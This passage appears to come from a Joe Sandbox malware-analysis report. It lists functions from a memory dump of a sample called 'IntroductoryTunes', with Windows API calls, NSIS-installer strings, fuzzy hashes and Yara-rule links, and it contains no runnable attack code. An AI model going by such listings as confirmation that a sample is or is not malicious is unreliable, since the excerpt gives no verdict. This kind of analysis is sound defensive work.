Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424976,759223A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
